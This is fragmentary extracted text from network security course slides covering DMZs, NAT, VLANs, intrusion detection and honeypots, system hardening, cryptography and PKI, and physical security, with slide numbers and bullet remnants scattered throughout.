Allow access to some database materials and email May include DNS, proxy, and modem servers Not for confidential or proprietary information Referred to as the demilitarized zone (DMZ)
Untrusted Networks
Outside your security perimeter Outside your control
DMZ
Used by a company to host its own Internet services without sacrificing unauthorized access to its private network Sits between Internet and internal networks line of defense, usually some combination of firewalls and bastion hosts Traffic originating from it should be filtered
continued
DMZ
Typically contains devices accessible to Internet traffic
o o o o
Web (HTTP) servers FTP servers SMTP (e-mail) servers DNS servers
Optional, more secure approach to a simple firewall; may include a proxy server
Intranet
Either a network topology or application (usually a Web portal) used as a single point of access to deliver services to employees Typically a collection of all LANs inside the firewall Shares company information and computing resources among employees
continued
10
Intranet
Allows access to public Internet through firewalls that screen communications in both directions to maintain company security Also called a campus network
Extranet
Private network that uses Internet protocol and public telecommunication system to provide various levels of accessibility to outsiders Can be accessed only with a valid username and password Identity determines which parts of the extranet you can view
continued
11
Extranet
Requires security and privacy
Firewall management Issuance and use of digital certificates or other user authentication o Encryption of messages o Use of VPNs that tunnel through the public network
o o
12
NAT
Most often used to map IPs from nonroutable private address spaces defined by RFC 1918 Static NAT and dynamic NAT Port Address Translation (PAT)
Variation of dynamic NAT Allows many hosts to share a single IP address by multiplexing streams differentiated by TCP/UDP port numbers o Commonly implemented on SOHO routers
o o
13
Tunneling
Enables a network to securely send its data through untrusted/shared network infrastructure Encrypts and encapsulates a network protocol within packets carried by second network Best-known example: virtual private networks Replacing WAN links because of security and low cost An option for most IP connectivity requirements
Example of a Tunnel
14
Benefits of VLANs
Network flexibility Scalability Increased performance Some security features
15
16
Prevention: Disable autonegotiation on all ports Prevention: Manually configure all trunk links with the VLANs that are permitted to traverse them
17
Chapter Summary
Technologies used to create network topologies that secure data and networked resources
o o o
Perimeter networks Network address translation (NAT) Virtual local area networks (VLANs)
18
Intrusion Detection
Chapter 12
Learning Objectives
Explain what intrusion detection systems are and identify some major characteristics of intrusion detection products Detail the differences between host-based and network-based intrusion detection Identify active detection and passive detection features of both host- and network-based IDS products
continued
Learning Objectives
Explain what honeypots are and how they are employed to increase network security Clarify the role of security incident response teams in the organization
True positives True negatives IDS missed an attack Benign activity reported as malicious
False positives
o
Types of IDS
Network-based (NIDS)
o o o o
Monitors network traffic Provides early warning system for attacks Monitors activity on host machine Able to stop compromises while they are in progress
Host-based (HIDS)
Network-based IDS
Uses a dedicated platform for purpose of monitoring network activity Analyzes all passing traffic Sensors have two network connections
One operates in promiscuous mode to sniff passing traffic o An administrative NIC sends data such as alerts to a centralized management system
o
NIDS Architecture
Place IDS sensors strategically to defend most valuable assets Typical locations of IDS sensors
o o o o
Just inside the firewall On the DMZ On the server farm segment On network segments connecting mainframe or midrange hosts
SPAN
Allows traffic sent or received in one interface to be copied to another monitoring interface Typically used for sniffers or NIDS sensors
Limitations of SPAN
Traffic between hosts on the same segment is not monitored; only traffic leaving the segment crosses the monitored link Switch may offer limited number of SPAN ports or none at all
Hub
Device for creating LANs that forward every packet received to every host on the LAN Allows only a single port to be monitored
Tap
Fault-tolerant hub-like device used inline to provide IDS monitoring in switched network infrastructures
10
11
Host-based IDS
Primarily used to protect only critical servers Software agent resides on the protected system Detects intrusions by analyzing logs of operating systems and applications, resource utilization, and other system activity Use of resources can have impact on system performance
12
HIDS Software
Host wrappers
o o
Inexpensive and deployable on all machines Do not provide in-depth, active monitoring measures of agent-based HIDS products More suited for single purpose servers
Agent-based software
o
13
continued
14
Used in networks where IDS administrator has carefully tuned the sensors behavior to minimize number of false positive alarms
15
TCP Reset
16
Also know as misuse detection IDS analyzes information it gathers and compares it to a database of known attacks, which are identified by their individual signatures
Anomaly detection
Baseline is defined to describe normal state of network or host o Any activity outside baseline is considered to be an attack
o
continued
17
Honeypots
False systems that lure intruders and gather information on methods and techniques they use to penetrate networksby purposely becoming victims of their attacks Simulate unsecured network services Make forensic process easy for investigators
18
Commercial Honeypots
ManTrap Specter Smoke Detector NetFacade
19
Honeypot Deployment
Goal
o
Gather information on hacker techniques, methodology, and tools Conduct research into hacker methods Detect attacker inside organizations network perimeter
Options
o o
Honeypot Design
Must attract, and avoid tipping off, the attacker Must not become a staging ground for attacking other hosts inside or outside the firewall
20
Incident Response
Every IDS deployment should include two documents to answer what now questions
o o
21
IDS Monitoring
Requires well-documented monitoring procedures that detail actions for specific alerts
22
continued
23
Chapter Summary
Two major types of intrusion detection
o o
Network-based IDS (monitor network traffic) Host-based IDS (monitor activity on individual computers)
24
Security Baselines
Chapter 13
Learning Objectives
Gain an understanding of OS/NOS vulnerabilities and hardening practices Understand the operation of a file system and how to secure a file system Explore common network hardening practices, including firmware updates and configuration best practices
continued
Learning Objectives
Identify network services commonly exploited by attackers and learn best practices for writing access control lists Explore vulnerabilities regarding network services such as Web, FTP, DNS, DHCP, Mail, File/Print Servers and Data Repositories as well as best practices in securing such services
Recognizes input from keyboard Sends output to display screen Keeps track of files and directories on the disk Controls peripheral devices (disk drives, printers)
OS/NOS Hardening
Process of modifying an OSs default configuration to make it more secure to outside threats May include removal of unnecessary programs and services May include application of patches to system kernel to limit vulnerability
OS/NOS Hardening
continued
File Systems
Store data that enable communication between an application and its supporting disk drives Setting privileges and access controls protect information stored on the computer
Common privileges: read, write (modify), lock, append, and execute o Group users by common needs o Additional rights can be granted to a single user in a group o Principle of least privilege
o
No world-writable files unless specifically required Mount files systems as read only and nosuid
continued
Assign access permission of immutable to all kernel files Establish all log files as append only Prevent users from installing, removing, or editing scripts Pay attention to access control inheritance when defining categories of files and users
Network Hardening
Crucial to have a network with availability as well as adequate security
Firmware Updates
Made available by vendors as vulnerabilities and malfunctions are discovered with previous versions
Configuration
Routing functions
Designed to route packets efficiently and reliably, but not securely o Not to be used to implement a security policy
o
Firewall systems
Should govern security of information flow in and out of the network o Provide a policy enforcement mechanism at a security domain boundary
o
10
Obtain IP addresses from ISP that connects to the firewall Obtain IP addresses from within the organization, typically from RFC 1918 specification
11
continued
12
Packet Filtering
Process of deciding disposition of each packet that can pass through a router Provides basic protection mechanism for a routing firewall device through inspection of packet contents Can be based on intrinsic or extrinsic information pertaining to a data packet
13
continued
14
15
continued
16
Application Hardening
Process of making applications software secure by ensuring that the software contains security enabling technology:
Sign in capabilities for authenticated network connections o Ability to run properly in secured configurations
o
17
Web Servers
Associated with more attacks and vulnerabilities than any type of server Designed to make information accessible, rather than to protect it
18
E-mail Servers
Serious risks associated with ability to receive email from the outside world
o o o
Attachments with malicious contents E-mails with abnormal MIME headers Scripts embedded into HTML-enabled mail
19
FTP Servers
File Transfer Protocol
o
20
DNS Servers
Domain Name Service (DNS)
o
Collective name for system of servers that translate names into addresses in a process transparent to the end user
21
22
NNTP Servers
Network News Transfer Protocol (NNTP)
Delivers news articles to users on the Internet Stores articles in a central database; users choose only items of interest o Makes few demands on structure, content, or storage of news articles
o o
NNTP servers can index and cross reference messages, and allow for notification of expiration
23
NNTP Servers
Similar vulnerabilities to other network services Effective methods of preventing attacks
o o o
Use proper authentication mechanisms Disable unneeded services Apply relevant software and OS patches
24
DHCP Servers
Dynamic Host Configuration Protocol (DHCP)
Software that assigns dynamic IP addresses to devices on a network o Reduces administrative burden o No security provisions
o
25
Collect Media Access Control (MAC) addresses of all computers on network and bind them to corresponding IP addresses
Use dynamic addressing, but monitor log files Use intrusion detection tools
continued
26
Data Repositories
Store data for archiving and user access Contain an organizations most valuable assets in terms of information Should be carefully protected
Directory Services
Lightweight Directory Access Protocol (LDAP)
Industry standard protocol for providing networking directory services for the TCP/IP model o Can store and locate information about entities and other network resources o Based on simple, treelike hierarchy called a Directory Information Tree (DIT)
o
27
28
Anonymous Simple Simple Authentication and Security Layer (SASL) for LDAPv3
Authorization
29
Chapter Summary
Role of operating and file systems as they relate to security of information resources stored on computer systems Operating system vulnerabilities Use of OS hardening practices to prevent attacks and system failures
continued
30
Chapter Summary
Vulnerabilities associated with common services installed on computer systems (WWW services, FTP, DNS) and best practices in protecting against threats to these services Maintenance and upgrade of computer systems
31
Cryptography
Chapter 14
Learning Objectives
Understand the basics of algorithms and how they are used in modern cryptography Identify the differences between asymmetric and symmetric algorithms Have a basic understanding of the concepts of cryptography and how they relate to network security
continued
Learning Objectives
Discuss characteristics of PKI certificates and the policies and procedures surrounding them Understand the implications of key management and a certificates lifecycle
Cryptography
Study of complex mathematical formulas and algorithms used for encryption and decryption Allows users to transmit sensitive information over unsecured networks Can be either strong or weak
Cryptography Terminology
Plaintext
o o
Data that can be read without any manipulation Method of disguising plaintext to hide its substance Plaintext that has been encrypted and is an unreadable series of symbols and numbers
Encryption Ciphertext
o
Algorithms
Mathematical functions that work in tandem with a key Same plaintext data encrypts into different ciphertext with different keys Security of data relies on:
o o
Hashing
Method used for verifying data integrity Uses variable-length input that is converted to a fixed-length output string (hash value)
Asymmetric
Symmetric Algorithms
Usually use same key for encryption and decryption Encryption key can be calculated from decryption key and vice versa Require sender and receiver to agree on a key before they communicate securely Security lies with the key Also called secret key algorithms, single-key algorithms, or one-key algorithms
Categories of Algorithms
Stream algorithms
o o
Operate on the plaintext one bit at a time Encrypt and decrypt data in groups of bits, typically 64 bits in size
Block algorithms
Asymmetric Algorithms
Use different keys for encryption and decryption Decryption key cannot be calculated from the encryption key Anyone can use the key to encrypt data and send it to the host; only the host can decrypt the data Also known as public key algorithms
Digital Signatures
Based on asymmetric algorithms, allow the recipient to verify whether a public key belongs to its owner
Certificates
Credentials that allow a recipient to verify whether a public key belongs to its owner
o
Verify senders information with identity information that is bound to the public key Public key One or more digital signatures Certificate information (eg, users name, ID)
Components
o o o
10
PKI Revocation
Certificates have a restricted lifetime; a validity period is created for all certificates Certificate revocation list (CRL)
o
11
Trust Models
Techniques that establish how users validate certificates
o o o
12
13
Web of Trust
Combines concepts of direct trust and hierarchical trust Adds the idea that trust is relative to each requester Central theme: the more information available, the better the decision
14
Registration
User requests certificate from CA CA verifies identity and credentials of user Certificate practice statement
o
Published document that explains CA structure to users Who may serve as CA What types of certificates may be issued How they should be issued and managed
15
Certificates
Distinguished name (DN)
Unique identifier that is bound to a certificate by a CA o Uses a sequence of character(s) that is unique to each user
o
16
Out-of-band distribution In-band distribution Publication Centralized repositories with controlled access
Key Backup
Addresses lost keys Helps recover encrypted data Essential element of business continuity and disaster recovery planning
17
Key Escrow
Key administration process that utilizes a third party Initialization phase involves:
o o
Cancellation Procedures
Certificate expiration Certificate revocation Key history Key archive
18
Certificate Expiration
Occurs when validity period of a certificate expires Options upon expiration
o o
Certificate Revocation
Implies cancellation of a certificate prior to its natural expiration Revocation delay
o
19
Certificate Revocation
How notification is accomplished
o o o o o o
Certificate revocation lists (CRLs) CRL distribution points Certificate revocation trees (CRTs) Redirect/Referral CRLs Short certificate lifetimes Single-entity approvals
Key History
Deals with secure and reliable storage of expired keys for later retrieval to recover encrypted data Applies more to encryption keys than signing keys
20
Key Archive
Service undertaken by a CA or third party to store keys and verification certificates Meets audit requirements and handles resolution of disputes when used with other services (eg, time stamping and notarization)
21
continued
22
Chapter Summary
Ways that algorithms and certificate mechanisms are used to encrypt data flows Concepts of cryptography Key and certificate life cycle management
23
Physical Security
Chapter 15
Learning Objectives
Understand the importance of physical security Discuss the impact of location on a facilitys security Identify major material factors when constructing a facility Understand how various physical barriers can enhance protection of vital resources
continued
Learning Objectives
Discuss the various biometric techniques used for access control Understand the importance of fire safety and fire detection
Physical Controls
When managing a network environment, it is critical to secure:
o o o o o
Equipment Data Power supplies Wiring Personnel with access to the location
Construction
Wall materials
o
Combustibility, load and weight bearing ratings Shatterproof, wired for alarms
Windows
continued
Construction
Location of shutoff valves for water and gas lines Location of fire detection and suppression devices
Physical Barriers
Address perimeter security Types of physical barriers
o o o
Types of Locks
Preset locks Cipher locks Biometric locks Multicriteria locks Device locks
Preset Locks
Typical locks that utilize a physical lock and key Least secure
Cipher Locks
Programmable locks that utilize a keypad for entering a PIN or password More expensive than preset locks Offer more security and flexibility Cipher lock options
o o o o
Cipher Locks
Cipher Locks
Biometric Locks
Verify users identity by a unique personal characteristic Complex, expensive, and secure
Multicriteria Locks
Combine strengths of other lock types As complexity increases, so does cost and security
Device Locks
Secure computer hardware and network devices Types
o o o o o
Cable lock (best known) Switch controls Slot locks Port controls Cable traps
Cable Locks
Fencing
Controls access to entrances Cost is directly related to:
o o o
Lighting
Deters intruders Provides safe environment for personnel
Physical Surveillance
Security guards Guard dogs
10
Technical Controls
Personnel access controls Surveillance Ventilation Power supply Fire detection and suppression
11
Identification Cards
Biometric Systems
Scan personal characteristics of a user and compare it to previous record created when user was added to the system
12
Technical Surveillance
Closed-circuit television cameras
Can be monitored at a central location Record all activity that takes place within critical areas o Allow security personnel to assess whether or not an area is being compromised
o o
13
Ventilation
Maintain air quality with a closed-loop recirculating air-conditioning system Control contamination from dust and other pollutants with positive pressurization and ventilation
Power Supply
Main methods to protect against power failure
o o
14
continued
15
Fire Suppression
Select fire suppression materials carefully Forms of fire detection response systems
Manual fire alarm pull-down devices o Automatic sensors
o
16
Natural Disasters
Floods Lightening Earthquakes
17
Chapter Summary
Physical security
o
Physical controls
Location Construction Physical barriers
Technical controls
Personnel access controls Surveillance Ventilation
18